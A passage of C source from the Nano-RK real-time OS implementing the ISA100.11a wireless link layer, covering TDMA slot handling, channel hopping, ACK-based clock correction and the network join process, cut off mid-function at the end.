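static void example_send( void )
{
static uint8_t payload[4] = { 1, 2, 3, 4 };
sendPacket( 0x0002, sizeof(payload), payload, example_tx_done );
}
#endif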
<file_sep>/ISA100.11a-master/ISA100_11a/backup_azi/code/current/nano-RK-well-sync/src/net/isa/isa.c
/******************************************************************************
* Nano-RK, a real-time operating system for sensor networks.
* Copyright (C) 2007, Real-Time and Multimedia Lab, Carnegie Mellon University
* All rights reserved.
*
* This is the Open Source Version of Nano-RK included as part of a Dual
* Licensing Model. If you are unsure which license to use please refer to:
* http://www.nanork.org/nano-RK/wiki/Licensing
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, version 2.0 of the License.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*
* Contributing Authors (specific to this file):
* <NAME>
*******************************************************************************/
//#include <rtl_debug.h>
#include <include.h>
#include <ulib.h>
#include <avr/sleep.h>
#include <avr/wdt.h>
#include <avr/eeprom.h>
#include <stdio.h>
#include <avr/interrupt.h>
#include <nrk.h>
#include <nrk_events.h>
#include <nrk_timer.h>
#include <nrk_error.h>
//#include <rtl_defs.h>
#include <stdlib.h>
#include <isa_scheduler.h>
#include <isa.h>
#include <isa_defs.h>
#define CHANNEL_HOPPING
//#define CORRECTION
//#define INIT_SYNC
#define LED_SLOT_DEBUG
//#define HIGH_TIMER_DEBUG
#define TX_RX_DEBUG
#define ACK_DEBUG
#define RX_DEBUG
#define TX_DEBUG
//#define JOIN_PROCESS
#ifdef JOIN_PROCESS
uint8_t join_pkt_buf[RF_MAX_PAYLOAD_SIZE];
#endif
/* slot related declaration */
volatile uint16_t global_slot;
volatile uint16_t current_global_slot;
volatile uint16_t global_cycle;
uint16_t last_sync_slot;
/* channel hopping related declaration */
uint8_t slottedPattern[16];
uint8_t slowPattern[3];
uint8_t currentChannel;
uint8_t channelIndex;
uint8_t slowIndex;
/*used for calculating offset*/
uint16_t slot_start_time;
uint16_t tx_start_time; // actual transmission starting time
uint16_t rx_start_time;
uint16_t offsetY;
uint16_t offsetX;
/* SYNC related declaration */
uint8_t _isa_sync_ok;
uint8_t AFTER_FIRST_SYNC;
uint16_t EXPIRATION = 200;// each slot lasts for 10ms, so 200 slots last for 2s
uint16_t slot_expired;
uint8_t previous_tx_slot;
/* signal related declaration */
int8_t isa_tx_done_signal;
int8_t isa_rx_pkt_signal;
/* header type */
uint8_t DHDR; // Data link layer header sub-header, currently used as ACK control
//uint8_t DMXHR[4]; //Data link layer media access control extension sub header, mainly used for security control
uint8_t DAUX[29]; //Data link layer auxiliary sub-header, currently used for join process
//uint8_t DROUT[3]; //Routing sub-header, compressed variant
//uint8_t DADDR[5]; //Addressing sub-header
uint8_t DHR; // ACK's data link layer header
/* Test variable */
uint8_t tmp_curSec;
uint8_t tmp_offsetSec;
int16_t tmp_offsetNanoSec;
uint16_t tmp_count=0;
void config_child_list (uint8_t node_id)
{
child_list |= ((uint32_t) 1) << node_id;
}
/**
* isa_set_channel()
*
* This function set channel and is used for channel hopping.
*
*/
void isa_set_channel (uint8_t chan)
{
isa_param.channel = chan;
rf_set_channel (chan);
}
uint8_t isa_get_channel()
{
return isa_param.channel;
}
void isa_set_channel_pattern(uint8_t pattern)
{
switch (pattern)
{
case 1:
slottedPattern[0] = 19;
slottedPattern[1] = 12;
slottedPattern[2] = 20;
slottedPattern[3] = 24;
slottedPattern[4] = 16;
slottedPattern[5] = 23;
slottedPattern[6] = 18;
slottedPattern[7] = 25;
slottedPattern[8] = 14;
slottedPattern[9] = 21;
slottedPattern[10] = 11;
slottedPattern[11] = 15;
slottedPattern[12] = 22;
slottedPattern[13] = 17;
slottedPattern[14] = 13;
slottedPattern[15] = 26;
break;
case 3:
slowPattern[0]=15;
slowPattern[1]=20;
slowPattern[2]=25;
break;
default:
break;
}
}
int8_t isa_ready()
{
if (_isa_ready == 1)
return NRK_OK;
else
return NRK_ERROR;
}
int8_t isa_rx_pkt_set_buffer(uint8_t *buf, uint8_t size)
{
if(size==0 || buf==NULL) return NRK_ERROR;
isa_rfRxInfo.pPayload = buf;
isa_rfRxInfo.max_length = size;
return NRK_OK;
}
int8_t isa_wait_until_rx_pkt()
{
nrk_signal_register(isa_rx_pkt_signal);
if (isa_rx_pkt_check() != 0)
return NRK_OK;
nrk_event_wait (SIG(isa_rx_pkt_signal));
return NRK_OK;
}
int8_t isa_wait_until_rx_or_tx ()
{
nrk_signal_register(isa_rx_pkt_signal);
nrk_signal_register(isa_tx_done_signal);
nrk_event_wait (SIG(isa_rx_pkt_signal) | SIG(isa_tx_done_signal));
return NRK_OK;
}
/**
* isa_init()
*
* This function sets up the low level link layer parameters.
* This starts the main timer routine that will then automatically
* trigger whenever a packet might be sent or received.
* This should be called before ANY scheduling information is set
* since it will clear some default values.
*
*/
uint8_t isa_init (isa_node_mode_t mode, uint8_t id, uint8_t src_id)
{
uint8_t i;
/* Generate signals */
isa_rx_pkt_signal=nrk_signal_create();
if(isa_rx_pkt_signal==NRK_ERROR){
nrk_kprintf(PSTR("ISA ERROR: creating rx signal failed\r\n"));
nrk_kernel_error_add(NRK_SIGNAL_CREATE_ERROR,nrk_cur_task_TCB->task_ID);
return NRK_ERROR;
}
isa_tx_done_signal=nrk_signal_create();
if(isa_tx_done_signal==NRK_ERROR){
nrk_kprintf(PSTR("ISA ERROR: creating tx signal failed\r\n"));
nrk_kernel_error_add(NRK_SIGNAL_CREATE_ERROR,nrk_cur_task_TCB->task_ID);
return NRK_ERROR;
}
// No buffer to start with
isa_rfRxInfo.pPayload = NULL;
isa_rfRxInfo.max_length = 0;
/*FIXME Actually we dont need to always run the high speed timer */
_nrk_high_speed_timer_start();
/* clear everything out */
global_cycle = 0;
global_slot = MAX_ISA_GLOBAL_SLOTS;
_isa_sync_ok = 0;
_isa_join_ok = 0;
slot_expired = 0;
isa_node_mode = mode;
isa_id = id;//change
isa_clk_src_id=src_id; //change
isa_rx_data_ready = 0;
isa_tx_data_ready = 0;
isa_param.mobile_sync_timeout = 100;
isa_param.rx_timeout = 8000; // 8000 *.125us = 1ms
isa_param.tx_guard_time = TX_GUARD_TIME;
isa_param.channel = 15;
isa_param.mac_addr = 0x1981;
for (i = 0; i < ISA_SLOTS_PER_FRAME; i++) {
isa_sched[i] = 0;
}
isa_tdma_rx_mask = 0;
isa_tdma_tx_mask = 0;
/* Setup the cc2420 chip */
rf_init (&isa_rfRxInfo, isa_param.channel, 0x2421, isa_param.mac_addr);
AFTER_FIRST_SYNC = 1;
/* Setup first hopping channel */
#ifdef CHANNEL_HOPPING
slowIndex=0;
if(id!=0){
channelIndex = src_id;
currentChannel = slottedPattern[channelIndex];
}else{
channelIndex = 0;
currentChannel = slottedPattern[channelIndex];
}
isa_set_channel(currentChannel);
#endif
#ifdef JOIN_PROCESS
if(mode==ISA_GATEWAY){
for(i=22;i<=24;i++){
isa_tx_info[i].pPayload = join_pkt_buf;
isa_tx_info[i].length = PKT_DATA_START+1; // pass le pointer
isa_tx_info[i].DHDR = configDHDR();
isa_tx_data_ready |= ((uint32_t) 1 << i); // set the flag
}
}
#endif
resync_times=0;
return NRK_OK;
}
void isa_start ()
{
//_isa_clear_sched_cache ();
_isa_ready = 2;
}
/**
* configDHDR()
*
* Gateway could config the DHDR by informing the nodes.
* DHDR contains control information that should be loaded
* into the PDU header.
*
*/
int8_t configDHDR()
{
int8_t DHDR = 1;
if(1){//request ACK
DHDR |= 1<<7;
}
if(1){//request signal quality in ACK
DHDR |= 1<<6;
}
if(1){//request EUI
DHDR |= 1<<5;
}
if(0){//include DAUX
DHDR |= 1<<4;
}
if(0){//include slow hopping offset
DHDR |= 1<<3;
}
if(isa_node_mode == ISA_RECIPIENT){//is clock recipient
DHDR |= 1<<2;
}
return DHDR;
}
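/*
 * Worked example: with the settings above (ACK, signal quality, and EUI
 * all requested), DHDR = 0x01 | 0x80 | 0x40 | 0x20 = 0xE1 for a clock
 * source, or 0xE5 once the clock-recipient bit (1<<2) is set as well.
 */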
/**
* configDHR()
*
* Gateway could config the DHR by informing the nodes.
* DHR contains control information that should be loaded
* into the ACK reply header.
*
*/
int8_t configDHR()
{
int8_t DHR = 3;
if(isa_node_mode != ISA_RECIPIENT){//include clock correction change
DHR |= 1<<7;
}
if(0){//including slow-hopping timeslot offset
DHR |= 1<<6;
}
if(0){//request EUI
DHR |= 1<<5;
}
if(0){//include DAUX
DHR |= 1<<4;
}
if(0){//include slow hopping offset
DHR |= 1<<3;
}
return DHR;
}
/**
* configAdvDAUX()
*
* Gateway could config the DAUX
* DAUX contains superframe and join information
*
*/
void configAdvDAUX(uint8_t chPattern, uint8_t chIndex, uint8_t sp_period, uint8_t tx_slot1, uint8_t tx_slot2, uint8_t tx_slot3, uint8_t tx_slot4, uint8_t rx_slot1, uint8_t rx_slot2, uint8_t rx_slot3, uint8_t rx_slot4)
{
/*ADVERTISEMENT SELECTION*/
DAUX[0]=0; // Advertisement selection, 0 indicates advertisement DAUX
/*TIME SYNCHRONIZATION*/
/* 1-6 bytes are reserved for time synchronization */
/*SUPERFRAME INFORMATION*/
DAUX[7]=10; // timeslot duration, currently not used.
DAUX[8]=0; // reserved for long timeslot duration
DAUX[9]=chPattern; // channel pattern selection
DAUX[10]=chIndex; // channel index selection
DAUX[11]=sp_period; // superframe period
DAUX[12]=0; // reserved for long period situation
/* 13 reserved for superframe cycle starting point
14 reserved of the length of slow hopping period
15 and 16 reserved for channel hopping channel map for spectrum management
*/
/*JOIN INFORMATION*/
/* 17 reserved for Join backoff and timeout
18 reserved for Indicates fields that are transmitted
*/
DAUX[19]=tx_slot1; //TX slot 1
DAUX[20]=tx_slot2; //TX slot 2
DAUX[21]=tx_slot3; //TX slot 3
DAUX[22]=tx_slot4; //TX slot 4
DAUX[23]=rx_slot1; //RX slot 1
DAUX[24]=rx_slot2; //RX slot 2
DAUX[25]=rx_slot3; //RX slot 3
DAUX[26]=rx_slot4; //RX slot 4
/*INTEGRITY CHECK*/
/* 27 and 28 are reserved for integrity check*/
}
/**
* isa_check_rx_status()
*
* This function returns if there is a packet in the link layer
* rx buffer. Once a packet has been received, it should be quickly
* processed or moved and then rtl_release_rx_packet() should be called.
* rtl_release_rx_packet() then resets the value of rtl_check_rx_status()
*
* Returns: 1 if a new packet was received, 0 otherwise
*/
int8_t isa_rx_pkt_check()
{
return isa_rx_data_ready;
}
/**
* isa_rx_pkt_get()
*
* This function returns the rx buffer point. It should be called
* once a packet is received and must be followed by isa_release_rx_packet().
* isa_release_rx_packet() then resets the value of isa_check_rx_status().
*
* Returns: rx buffer point
*/
uint8_t* isa_rx_pkt_get (uint8_t *len, int8_t *rssi)
{
if(isa_rx_pkt_check()==0){
*len=0;
*rssi=0;
return NULL;
}
*len=isa_rfRxInfo.length;
*rssi=isa_rfRxInfo.rssi;
return isa_rfRxInfo.pPayload;
}
/**
* _isa_rx()
*
* This is the low level RX packet function. It will read in
* a packet and buffer it in the link layer's single RX buffer.
* This buffer can be checked with rtl_check_rx_status() and
* released with rtl_release_rx_packet(). If the buffer has not
* been released and a new packet arrives, the packet will be lost.
* This function is only called from the timer interrupt routine.
*
* Arguments: slot is the current slot that is actively in RX mode.
*/
void _isa_rx (uint8_t slot)
{
uint8_t n;
uint32_t node_mask;
volatile uint8_t timeout;
#ifdef LED_DEBUG
nrk_led_set(1);
#endif
rf_set_rx (&isa_rfRxInfo, isa_param.channel); // sets rx buffer and channel
rf_polling_rx_on ();
// Timing for waiting for sfd
timeout = _nrk_os_timer_get();
timeout+=4; // 4ms
n = 0;
//nrk_gpio_set(NRK_DEBUG_3);
while ((n = rf_rx_check_sfd()) == 0) {
if (_nrk_os_timer_get() > timeout) {
//spend too much time on waiting for a pkt's arrival
rf_rx_off ();
#ifdef LED_DEBUG
nrk_led_clr(1);
#endif
#ifdef RX_DEBUG
//printf("sfd times out.\n\r");
#endif
return;
}
}
//printf("%d\n\r",_nrk_high_speed_timer_get());
// sfd received, start receiving packet and record start time
rx_start_time = _nrk_high_speed_timer_get();
// Timing for waiting for finishing packet receiving
timeout = _nrk_os_timer_get();
timeout += 5; // 5ms
if (n != 0) {
n = 0;
// printf("Packet on its way\n\r");
while ((n = rf_polling_rx_packet (false,128)) == 0) {
//printf("%d\n\r",_nrk_os_timer_get());
if (_nrk_os_timer_get () > timeout) {
#ifdef RX_DEBUG
printf("packet is too long, times out.\n\r");
#endif
// spend too much time on receiving pkt.
return; // huge timeout as fail safe
}
}
}
rf_rx_off ();
if (n == 1) {// successfully received packet
nrk_led_toggle(BLUE_LED);
putchar ('r');
isa_rx_data_ready = 1;
//potential problem: if repeater or recipient receives noise, the DHDR would be changed. And it is highly possible that the highest bit of DHDR would be set to 0
/* if(isa_node_mode != ISA_GATEWAY)
DHDR = isa_rfRxInfo.pPayload[DHDR_INDEX];
*/
#ifdef RX_DEBUG
// printf("Repeater slot = %d, local slot is %d.\n\r", isa_rfRxInfo.pPayload[SLOT_INDEX],global_slot);
#endif // RX_DEBUG
nrk_event_signal(isa_rx_pkt_signal);
//_nrk_high_speed_timer_reset();
//nrk_high_speed_timer_wait(0,CPU_PROCESS_TIME);
//nrk_gpio_set(NRK_DEBUG_3);
node_mask = ((uint32_t) 1) << isa_rfRxInfo.pPayload[SRC_INDEX];
if( !(node_mask & child_list))
return; //FIXME change
// ACK required
if(DHDR & (1<<7)){
// Transmit ACK packet
DHR = configDHR();
isa_ack_buf[DHR_INDEX]= DHR;
#ifdef ACK_DEBUG
//printf("DHR is %d.\n\r",DHR);
#endif
isa_ack_tx.pPayload = isa_ack_buf;
if (DHDR & (1<<2)){ // recipient , only reply explicit ACK
//isa_ack_tx.length = PKT_DATA_START-1;
isa_ack_tx.length = 2;
}
else { //reply ACK with time offsetX
offsetX = rx_start_time - slot_start_time;
//printf("slot_start_time is %d,rx_start_time is %d.\n\r",slot_start_time,rx_start_time);
uint8_t temp1,temp2;
temp1 = (offsetX & 0xFF00)>>8;
isa_ack_buf[OFFSET_HIGH]=temp1;
temp2 = (offsetX & 0x00FF);
isa_ack_buf[OFFSET_LOW]=temp2;
#ifdef ACK_DEBUG
// printf("offsetX is %d\n\r", offsetX);
#endif
//isa_ack_tx.length = PKT_DATA_START + 1;
isa_ack_tx.length = 4;
}
rf_tx_tdma_packet (&isa_ack_tx,slot_start_time,isa_param.tx_guard_time,&tx_start_time);
}
//nrk_gpio_clr(NRK_DEBUG_3);
}
#ifdef LED_DEBUG
nrk_led_clr (1);
#endif
}
/**
* isa_release_rx_packet()
*
* This function releases the link layer's hold on the rx buffer.
* This must be called after a packet is received before a new
* packet can be buffered! This should ideally be done by the
* network layer.
*
*/
void isa_rx_pkt_release()
{
isa_rx_data_ready = 0;
}
/**
* rtl_tx_packet()
*
* This function associates a slot with a particular packet that needs
* to be sent.
*
* Arguments: RF_TX_INFO *tx is a pointer to a transmit structure, this structure
* must have a valid pPayload pointer to the real packet.
* uint8_t slot is the value of the tx slot (starting from 0)
*
* Return: currently always returns 1
*/
int8_t isa_tx_pkt (uint8_t *tx_buf, uint8_t len, uint8_t DHDR, uint8_t slot)
{
isa_tx_info[slot].pPayload = tx_buf;
isa_tx_info[slot].length = len; // pass le pointer
isa_tx_info[slot].DHDR = DHDR;
isa_tx_data_ready |= ((uint32_t) 1 << slot); // set the flag
return 1;
}
/**
* isa_tx_pkt_check()
*
* This function allows an upper layer to check if a TX packet
* has been sent. For instance, you would first send a packet
* and then you could sleep or do more work, and eventually check
* done = isa_tx_pkt_check(8);
* to see if the packet had been sent by the interrupt routine.
*
* Returns: 1 if the packet was sent, 0 otherwise
*/
int8_t isa_tx_pkt_check(uint8_t slot)
{
if ((isa_tx_data_ready & ((uint32_t) 1 << slot)) != 0)
return 1;
return 0;
}
/**
* _isa_tx()
*
* This function is the low level TX function.
* It is only called from the timer interrupt and fetches any
* packets that were set for a particular slot by rtl_tx_packet().
*
* Arguments: slot is the active slot set by the interrupt timer.
*/
void _isa_tx (uint8_t slot)
{
uint8_t n;
uint8_t i;
int8_t tmp;
volatile uint8_t timeout;
uint8_t offsetSec, curSec;
uint16_t offsetNanoSec;
int16_t time_correction;
uint8_t tmp_nrk_prev_timer_val;
// load header
isa_rfTxInfo.cca = true;
isa_rfTxInfo.pPayload=isa_tx_info[slot].pPayload;
#ifdef TX_DEBUG
//printf("TX Payload is: %s.\n\r", isa_rfTxInfo.pPayload);
#endif
isa_rfTxInfo.length=isa_tx_info[slot].length;
isa_rfTxInfo.pPayload[DHDR_INDEX] = isa_tx_info[slot].DHDR;
isa_rfTxInfo.pPayload[SLOT_INDEX] = (global_slot & 0xFF);
isa_rfTxInfo.pPayload[SRC_INDEX] = isa_id;//change
#ifdef JOIN_PROCESS
if(slot>=22 && isa_node_mode == ISA_GATEWAY){
for(i=0;i<29;i++){
isa_rfTxInfo.pPayload[DAUX_INDEX+i]=DAUX[i];
//printf("DAUX[%d]=%d\r\n",i,isa_rfTxInfo.pPayload[DAUX_INDEX+i]);
}
}
#endif
// FIXME a small bug. should not happen and should be fixed in _isa_init_sync()
//if(AFTER_FIRST_SYNC == 1){
_nrk_high_speed_timer_reset();
nrk_high_speed_timer_wait(0,WAIT_TIME_BEFORE_TX);
//AFTER_FIRST_SYNC = 0;
//}
#ifdef TX_RX_DEBUG
//nrk_gpio_set(NRK_DEBUG_1);
//printf("T\r\n");
#endif
if(rf_tx_tdma_packet (&isa_rfTxInfo,slot_start_time,isa_param.tx_guard_time,&tx_start_time))
{
nrk_led_toggle(RED_LED);
putchar ('t');
//("rx_start_time is %d.\n\r",_nrk_high_speed_timer_get());
offsetY = tx_start_time - slot_start_time;
//printf("offset Y is %d.\n\r",offsetY);
#ifdef HIGH_TIMER_DEBUG
//printf("In isa.c _isa_tx(): offsetY is %d, tx_start_time is %d\n\r",offsetY,tx_start_time);
#endif
}
nrk_event_signal (isa_tx_done_signal);
isa_tx_data_ready &= ~((uint32_t) 1 << slot); // clear the flag
// ACK required
if(DHDR & (1<<7) && isa_node_mode!=ISA_GATEWAY){ //Azriel
rf_polling_rx_on ();
_nrk_high_speed_timer_reset();
nrk_high_speed_timer_wait(0,CPU_PROCESS_TIME);
//nrk_gpio_set(NRK_DEBUG_1);
// Timing for waiting for receiving ACK
timeout = _nrk_os_timer_get();
timeout+=2; // 2ms
n = 0;
while ((n = rf_rx_check_sfd()) == 0) {
if (_nrk_os_timer_get() > timeout) {
tmp = slot - previous_tx_slot;
if(slot == previous_tx_slot)
slot_expired += 25;
else{
tmp = slot - previous_tx_slot;
if(tmp>0)
slot_expired += tmp;
else
slot_expired += 25+tmp;
}
//printf("%d,%d,%d,%d,%d\n\r",slot_expired,tmp_curSec,tmp_offsetSec,tmp_offsetNanoSec,++tmp_count);
//printf("%d,%d\n\r",slot_expired,isa_param.channel);
//printf("%d,%d,%d\n\r",slot_expired,slot,previous_tx_slot);
//spend too much time on waiting for a pkt's arrival
rf_rx_off ();
#ifdef LED_DEBUG
nrk_led_clr(1);
#endif
#ifdef RX_DEBUG
// printf("sfd times out.\n\r");
#endif
//nrk_gpio_clr(NRK_DEBUG_1);
return;
}
}
nrk_gpio_clr(NRK_DEBUG_1);
timeout = _nrk_os_timer_get();
timeout += 2; // 2ms
if (n != 0) {
n = 0;
//printf("Packet on its way\n\r");
while ((n = rf_polling_rx_packet (true,4)) == 0) {
//printf("%d\n\r",_nrk_os_timer_get());
if (_nrk_os_timer_get () > timeout) {
#ifdef RX_DEBUG
printf("packet is too long, times out.\n\r");
#endif
tmp_curSec = _nrk_os_timer_get();
// spend too much time on receiving pkt.
return; // huge timeout as fail safe
}
//if(n==-6)
// printf("%d\n\r",_nrk_os_timer_get());
}
}
rf_rx_off ();
if (n == 1) {// successfully received ACK
slot_expired = 0;
//isa_rx_data_ready = 1;
DHR = isa_rfRxInfo.pPayload[DHR_INDEX];
#ifdef ACK_DEBUG
//printf("DHR = %d.\n\r", isa_rfRxInfo.pPayload[DHR_INDEX]);
#endif // ACK_DEBUG
if((DHDR & (1<<7))&&isa_node_mode!=ISA_GATEWAY){
if(DHR & (1<<7)){
offsetX = (((uint16_t)isa_rfRxInfo.pPayload[OFFSET_HIGH])<<8) | isa_rfRxInfo.pPayload[OFFSET_LOW];
#ifdef ACK_DEBUG
// printf("offset X is %d.\n\r", offsetX);
// printf("offset Y is %d.\n\r", offsetY);
nrk_led_toggle(ORANGE_LED);
putchar('a');
#endif // ACK_DEBUG
//printf("%d,%d\n\r",offsetX,offsetY);
time_correction = offsetX - offsetY;
#ifdef HIGH_TIMER_DEBUG
printf("time correction is %d.\n\r", time_correction);
#endif
//printf("time correction is %d.\n\r", time_correction);
// SYNC as a by-product of communication.
//tmp_nrk_prev_timer_val = _nrk_prev_timer_val;
//printf("%d\n\r",time_correction);
//printf("%d\n\r",HIGH_TIMER_TICKES_PER_MILISEC-time_correction%HIGH_TIMER_TICKES_PER_MILISEC);
timeout=50;
curSec = _nrk_os_timer_get();
if(time_correction >= 0&&curSec<7){
tmp_curSec = curSec;
/*do{
curSec = _nrk_os_timer_get();
}while(curSec<=7);*/
_nrk_os_timer_stop();
//_nrk_os_timer_reset();
offsetSec = time_correction/HIGH_TIMER_TICKES_PER_MILISEC+1;
tmp_offsetSec = offsetSec;
offsetNanoSec = HIGH_TIMER_TICKES_PER_MILISEC-time_correction%HIGH_TIMER_TICKES_PER_MILISEC;
tmp_offsetNanoSec = offsetNanoSec;
//printf("%d,%d\n\r",curSec,offsetSec);
//if(curSec+offsetSec>=10)
//printf("%d,%d\n\r",curSec,offsetSec);
/*if(curSec+offsetSec>=9){
_nrk_set_next_wakeup(curSec+offsetSec+2);
if(curSec+offsetSec>=10)
printf("%d,%d\n\r",curSec,offsetSec);
}
else
_nrk_set_next_wakeup(10);*/
_nrk_high_speed_timer_reset();
nrk_spin_wait_us(50);
//printf("%d,%d,%d\n\r",curSec,offsetSec,offsetNanoSec);
nrk_gpio_set(NRK_DEBUG_2);
do{}while(_nrk_high_speed_timer_get()<offsetNanoSec);
nrk_gpio_clr(NRK_DEBUG_2);
//nrk_high_speed_timer_wait(0,offsetNanoSec);
//nrk_high_speed_timer_wait(0,4912);
_nrk_os_timer_set(curSec+offsetSec);
nrk_spin_wait_us(100);
#ifdef CORRECTION
nrk_gpio_set(NRK_DEBUG_1);
nrk_gpio_clr(NRK_DEBUG_1);
#endif
//printf("p\n\r");
_nrk_os_timer_start();
}else if(-time_correction>8000&&curSec<7){
_nrk_os_timer_stop();
//_nrk_os_timer_reset();
_nrk_high_speed_timer_reset();
do{
NOP();
NOP();
NOP();
NOP();
}while(timeout--);
//_nrk_set_next_wakeup(10);
#ifdef CORRECTION
nrk_gpio_set(NRK_DEBUG_2);
//nrk_high_speed_timer_wait(0,22800); // for test
nrk_gpio_clr(NRK_DEBUG_2);
#endif
//printf("%d\n\r",-time_correction);
nrk_high_speed_timer_wait(0,-time_correction);
_nrk_os_timer_set(curSec);
timeout = 100;
do{
NOP();
NOP();
NOP();
NOP();
}while(timeout--);
_nrk_os_timer_start();
}
//_nrk_prev_timer_val=tmp_nrk_prev_timer_val;
//nrk_cur_task_TCB->next_wakeup = 10;
_nrk_high_speed_timer_reset();
nrk_spin_wait_us(50);
}
}
}
}//wait for ACK
}
uint8_t _isa_join_process ()
{
int8_t n;
uint16_t timeout;
uint16_t timer;
uint8_t tdma_start_tick;
uint8_t battery_save_cnt;
uint8_t last_nrk_tick;
uint8_t i;
timer=0;
battery_save_cnt=0;
while(1)
{
rf_set_rx (&isa_rfRxInfo, isa_param.channel); // sets rx buffer and channel
rf_polling_rx_on ();
n = 0;
_isa_sync_ok = 0;
last_nrk_tick=0; // should be 0 going in
//_nrk_prev_timer_val=250;
//_nrk_set_next_wakeup(250);
//_nrk_os_timer_set(0);
//timeout=200;
while ((n = rf_rx_check_sfd()) == 0) {
// every OS tick
if(last_nrk_tick!=_nrk_os_timer_get()) {
last_nrk_tick=_nrk_os_timer_get();
timer++;
if(timer>ISA_TOKEN_TIMEOUT){
timer=0;
break;
}
}
}
//_nrk_high_speed_timer_reset();
tdma_start_tick=_nrk_os_timer_get();
timeout = tdma_start_tick+4;
// an interrupt could happen in here and mess things up
if (n != 0) {
n = 0;
// Packet on its way
while ((n = rf_polling_rx_packet (false,128)) == 0) {
if (_nrk_os_timer_get () > timeout)
{
//nrk_kprintf( PSTR("Pkt timed out\r\n") );
break; // huge timeout as failsafe
}
}
}
rf_rx_off ();
if (n == 1 /*&& isa_rfRxInfo.length>0*/) {
// if(isa_rfRxInfo.pPayload[SRC_INDEX]==isa_clk_src_id){//change
// CRC and checksum passed
if(isa_rfRxInfo.pPayload[DAUX_INDEX+7]==10){ // DAUX packet
isa_rx_data_ready = 1;
//global_slot = (volatile)isa_rfRxInfo.pPayload[SLOT_INDEX];
isa_set_channel_pattern(isa_rfRxInfo.pPayload[DAUX_INDEX+9]); //set channel hopping pattern
channelIndex=isa_rfRxInfo.pPayload[DAUX_INDEX+10];
currentChannel = slottedPattern[channelIndex];
isa_set_channel(currentChannel);
for(i=0;i<4;i++){ // set tx slots
if(isa_rfRxInfo.pPayload[DAUX_INDEX+19+i]==0)
break;
else{
isa_tdma_tx_mask |= ((uint32_t) 1) << isa_rfRxInfo.pPayload[DAUX_INDEX+19+i];
isa_sched[isa_rfRxInfo.pPayload[DAUX_INDEX+19+i]] = 1;
tx_slot_from_join[i]=isa_rfRxInfo.pPayload[DAUX_INDEX+19+i];
// printf("TX:%d\r\n",tx_slot_from_join[i]);
}
}
for(i=0;i<4;i++){ // set rx slots
if(isa_rfRxInfo.pPayload[DAUX_INDEX+23+i]==0)
break;
else{
isa_tdma_rx_mask |= ((uint32_t) 1) << isa_rfRxInfo.pPayload[DAUX_INDEX+23+i];
isa_sched[isa_rfRxInfo.pPayload[DAUX_INDEX+23+i]] = 1;
}
}
nrk_event_signal(isa_rx_pkt_signal);
break;
}
// }
}
}
_isa_join_ok=1;
isa_rx_pkt_release();
return _isa_join_ok;
}
int8_t isa_join_ready()
{
if (_isa_join_ok == 1)
return NRK_OK;
else
return NRK_ERROR;
}
/** FIXME this is only a temporary function and needs to be made more specific
* _isa_init_sync()
*
* This function is used for join process.
* A node that wants to join the network would keep listening first
* and set up first sync.
*
* Return: _isa_sync_ok.
*/
uint8_t _isa_init_sync ()
{
int8_t n;
uint16_t timeout;
uint16_t timer;
uint8_t tdma_start_tick;
uint8_t battery_save_cnt;
uint8_t last_nrk_tick;
uint8_t tmp_nrk_prev_timer_val;
//volatile uint16_t sfd_start_time;
//printf("%d,%d\n\r",isa_param.channel,global_slot);
// DISABLE_GLOBAL_INT ();
timer=0;
battery_save_cnt=0;
while(1)
{
//printf("Init sync \r\n");
isa_rfRxInfo.pPayload[DHDR_INDEX]=configDHDR();
//isa_rfRxInfo.pPayload[SLOT_INDEX]=global_slot;
#ifdef LED_DEBUG
nrk_led_set(1);
#endif
rf_set_rx (&isa_rfRxInfo, isa_param.channel); // sets rx buffer and channel
rf_polling_rx_on ();
n = 0;
_isa_sync_ok = 0;
last_nrk_tick=0; // should be 0 going in
//_nrk_prev_timer_val=250;
_nrk_set_next_wakeup(250);
_nrk_os_timer_set(0);
//timeout=200;
while ((n = rf_rx_check_sfd()) == 0) {
// every OS tick
if(last_nrk_tick!=_nrk_os_timer_get()) {
last_nrk_tick=_nrk_os_timer_get();
timer++;
if(timer>ISA_TOKEN_TIMEOUT){
timer=0;
break;
}
}
}
//printf("3 \n");
_nrk_high_speed_timer_reset();
// capture SFD transition with high speed timer
//sfd_start_time=_nrk_high_speed_timer_get();
tdma_start_tick=_nrk_os_timer_get();
timeout = tdma_start_tick+4;
// an interrupt could happen in here and mess things up
if (n != 0) {
n = 0;
// Packet on its way
while ((n = rf_polling_rx_packet (false,128)) == 0) {
// printf("4 \n");
if (_nrk_os_timer_get () > timeout)
{
//nrk_kprintf( PSTR("Pkt timed out\r\n") );
break; // huge timeout as failsafe
}
}
}
rf_rx_off ();
//printf("5 \n");
if (n == 1 /*&& isa_rfRxInfo.length>0*/) {
if(isa_rfRxInfo.pPayload[SRC_INDEX]==isa_clk_src_id){//change
// CRC and checksum passed
isa_rx_data_ready = 1;
//rtl_rx_slot = 0;
//DHDR = (volatile)isa_rfRxInfo.pPayload[DHDR_INDEX];
global_slot += isa_rfRxInfo.pPayload[SLOT_INDEX];
nrk_led_toggle(GREEN_LED);
putchar ('i');
nrk_event_signal(isa_rx_pkt_signal);
break;
//
}
}
}
#ifdef LED_DEBUG
nrk_led_clr(1);
#endif
//printf("os_timer=%d\r\n",_nrk_os_itimer_get());
#ifdef INIT_SYNC
nrk_gpio_set(NRK_DEBUG_1);
#endif
_isa_sync_ok = 1;
isa_rx_pkt_release();
tmp_nrk_prev_timer_val=_nrk_prev_timer_val;
_nrk_os_timer_stop();
//_nrk_os_timer_reset();
_nrk_set_next_wakeup(10);
_nrk_os_timer_set(7);
nrk_high_speed_timer_wait(0,SFD_TO_NEXT_SLOT_TIME);
//_nrk_os_timer_reset();
_nrk_os_timer_start();
//_nrk_prev_timer_val=9;
//printf("%d\n\r", _nrk_os_timer_get());
nrk_cur_task_TCB->next_wakeup = 10;
//printf("%d\n\r",_nrk_prev_timer_val);
// _nrk_high_speed_timer_reset();
// slot_start_time=_nrk_high_speed_timer_get();
#ifdef INIT_SYNC
nrk_gpio_clr(NRK_DEBUG_1);
#endif
return _isa_sync_ok;
}
void isa_nw_task ()
{
uint8_t slot;
uint32_t slot_mask;
uint16_t next_slot_offset = 0;
uint8_t FIRST = 1;
